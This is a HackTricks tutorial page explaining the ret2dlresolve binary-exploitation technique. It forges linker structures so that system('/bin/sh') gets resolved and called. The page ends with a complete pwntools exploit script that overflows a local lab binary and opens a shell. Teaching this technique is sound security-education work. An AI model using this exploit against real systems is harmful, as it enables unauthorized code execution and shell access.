5.3 KiB
Ret2dlresolve
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Basic Information
As explained in the page about GOT/PLT and Relro, binaries without Full Relro will resolve symbols (like addresses to external libraries) the first time they are used. This resolution occurs calling the function _dl_runtime_resolve
.
The _dl_runtime_resolve
function takes from the stack references to some structures it needs in order to resolve the specified symbol.
Therefore, it's possible to fake all these structures to make the dynamic linked resolving the requested symbol (like system
function) and call it with a configured parameter (e.g. system('/bin/sh')
).
Usually, all these structures are faked by making an initial ROP chain that calls read
over a writable memory, then the structures and the string '/bin/sh'
are passed so they are stored by read in a known location, and then the ROP chain continues by calling _dl_runtime_resolve
with the address to $'/bin/sh'
.
{% hint style="success" %} This technique is useful specially if there aren't syscall gadgets (to use techniques such as ret2syscall or SROP) and there are't ways to leak libc addresses. {% endhint %}
You can find a better explanation about this technique in the second half of the video:
{% embed url="https://youtu.be/ADULSwnQs-s?feature=shared" %}
Structures
It's necessary to fake 3 structures: JMPREL
, STRTAB
and SYMTAB
. You have a better explanation about how these are built in https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve#structures
Attack Summary
- Write fake estructures in some place
- Set the first argument of system (
$rdi = &'/bin/sh'
) - Set on the stack the addresses to the structures to call
_dl_runtime_resolve
- Call
_dl_runtime_resolve
system
will be resolved and called with'/bin/sh'
as argument
Example
You can find an example of this technique here containing a very good explanation of the final ROP chain, but here is the final exploit used:
from pwn import *
elf = context.binary = ELF('./vuln', checksec=False)
p = elf.process()
rop = ROP(elf)
# create the dlresolve object
dlresolve = Ret2dlresolvePayload(elf, symbol='system', args=['/bin/sh'])
rop.raw('A' * 76)
rop.read(0, dlresolve.data_addr) # read to where we want to write the fake structures
rop.ret2dlresolve(dlresolve) # call .plt and dl-resolve() with the correct, calculated reloc_offset
log.info(rop.dump())
p.sendline(rop.chain())
p.sendline(dlresolve.payload) # now the read is called and we pass all the relevant structures in
p.interactive()
References
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.